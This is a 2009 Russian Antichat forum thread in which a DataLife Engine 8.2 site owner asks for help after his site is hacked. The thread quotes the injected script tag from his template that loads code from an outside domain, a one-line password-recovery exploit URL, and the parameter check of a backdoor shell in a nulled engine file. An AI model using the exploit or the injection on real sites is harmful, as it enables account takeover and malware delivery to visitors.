ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нужна помощь ломают сайт
  #1  
Старый 10.12.2009, 00:17
Аватар для IOzer
IOzer
Новичок
Регистрация: 07.12.2009
Сообщений: 3
Провел на форуме:
19689

Репутация: 0
Question Нужна помощь ломают сайт

В общем проблемка такая. Недавно захожу на свой сайт и на своё удивление вижу что от куда то появилась рекламма кликандера. Попытался воити под админским аккаунтом, но так и не смог кто то сменил пароль, вобщем я воспользовался восстановлением пароля на e-mail зашёл в админку и нашёл в шаблоне такой код:
Код:
<script language='javascript' type='text/javascript' src='http://softxx.ru/m'></script>
посмотрел с какого IP последний раз заходили в админку 81.222.236.109
Информация об ip-адресе 81.222.236.109

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '81.222.236.0 - 81.222.236.255'

inetnum: 81.222.236.0 - 81.222.236.255
netname: TimeWeb
descr: Hosting Service Provider
country: RU
admin-c: AAB74-RIPE
tech-c: AAB74-RIPE
status: ASSIGNED PA
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

person: Alexandr A Boykov
address: 13, Sedova st.
address: 192148, Saint-Petersburg
address: Russia
phone: +7 812 3341520
fax-no: +7 812 3341530
abuse-mailbox: abuse@timeweb.ru
nic-hdl: AAB74-RIPE
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

% Information related to '81.222.192.0/18AS20597'

route: 81.222.192.0/18
descr: ELTEL.net
origin: AS20597
mnt-by: ELTEL-RIPE-MNT
source: RIPE # Filtered

Как я понял что кто то c VDS на TimeWebe ломает
Пробовал переименовать файл admin.php, но к сожалению не помогло сейчас снова ломанули
хочу сейчас права на запись main.tpl убрать незнаю поможет или нет
Подскажите что можно поделать сайт стоит на DLE
 
Ответить с цитированием

  #2  
Старый 10.12.2009, 00:19
Аватар для .antibiotic.
.antibiotic.
[bald man]
Регистрация: 13.07.2009
Сообщений: 623
Провел на форуме:
4490909

Репутация: 1167


По умолчанию

обновить версию дле
 
Ответить с цитированием

  #3  
Старый 10.12.2009, 00:22
Аватар для Thenno
Thenno
Участник форума
Регистрация: 03.07.2009
Сообщений: 151
Провел на форуме:
638378

Репутация: 41
Отправить сообщение для Thenno с помощью ICQ
По умолчанию

Попробуй DLE обновить и попроси кого-нибудь из прошареных знакомых сайт на уязвимости проверить, может найдете дырку, через которую зараза лезет.
 
Ответить с цитированием

  #4  
Старый 10.12.2009, 00:24
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

смотри логи, мож найдеш чего интересного
 
Ответить с цитированием

  #5  
Старый 10.12.2009, 00:28
Аватар для IOzer
IOzer
Новичок
Регистрация: 07.12.2009
Сообщений: 3
Провел на форуме:
19689

Репутация: 0
По умолчанию

версия DLE 8.2
дело в том что у меня есть ещё пару сайтов на dle они на более старых версиях, но там всё нормально никто не ломает
кстати сейчас погуглил нашёл http://devilstar.habrahabr.ru/blog/76359/ видимо не только у меня такая проблемка
 
Ответить с цитированием

  #6  
Старый 11.12.2009, 05:48
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

http://drtro.name/249-dle-8-2-nedostatochnye-filtraciya-v-praktike/
обнови свой дле
 
Ответить с цитированием

  #7  
Старый 30.12.2009, 05:19
Аватар для sir95
sir95
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191

Репутация: 0
По умолчанию

Точно такая проблема была сайт ломали по 3-4 раза на день! Поставил 8.3 всё нормально!

Последний раз редактировалось sir95; 30.12.2009 в 14:47..
 
Ответить с цитированием

  #8  
Старый 30.12.2009, 05:42
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

http://forum.antichat.ru/showpost.php?p=1683160&postcount=83
Цитата:
Найдена уязвимость в DLE 8.2(Только в этой версии)
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1
хм
 
Ответить с цитированием

  #9  
Старый 31.12.2009, 02:11
Аватар для LaMer0n
LaMer0n
Участник форума
Регистрация: 25.03.2006
Сообщений: 125
Провел на форуме:
346335

Репутация: 16
Отправить сообщение для LaMer0n с помощью ICQ Отправить сообщение для LaMer0n с помощью AIM Отправить сообщение для LaMer0n с помощью Yahoo
По умолчанию

средствами сервера поставь пароль на папку с админкой, с самим файлом .htaccess гемороится не советую, если есть директ админ - там это сделать очень просто.
 
Ответить с цитированием

  #10  
Старый 03.01.2010, 04:36
Аватар для GL_Loney
GL_Loney
Познающий
Регистрация: 19.06.2009
Сообщений: 62
Провел на форуме:
326503

Репутация: -5
Отправить сообщение для GL_Loney с помощью ICQ
По умолчанию

В DLE 8.2 в одном из компонентов движка шелл.
Настоятельно рекомендую проверить файлик, лежащий по адресу - engine/ajax/updates.php
Ищем там такую шнягу - if($_GET['wert']=='')
Измени/обнови файл.
В следующий раз качай нуллы из достоверных источников.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Статья] Для чего создавать сайт и каким он должен быть? Validol Статьи 1 12.10.2009 16:34
Обзор бесплатных Cms em00s7 PHP, PERL, MySQL, JavaScript 16 03.07.2009 13:13
Раскрутка сайта heks Статьи 15 15.02.2009 19:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ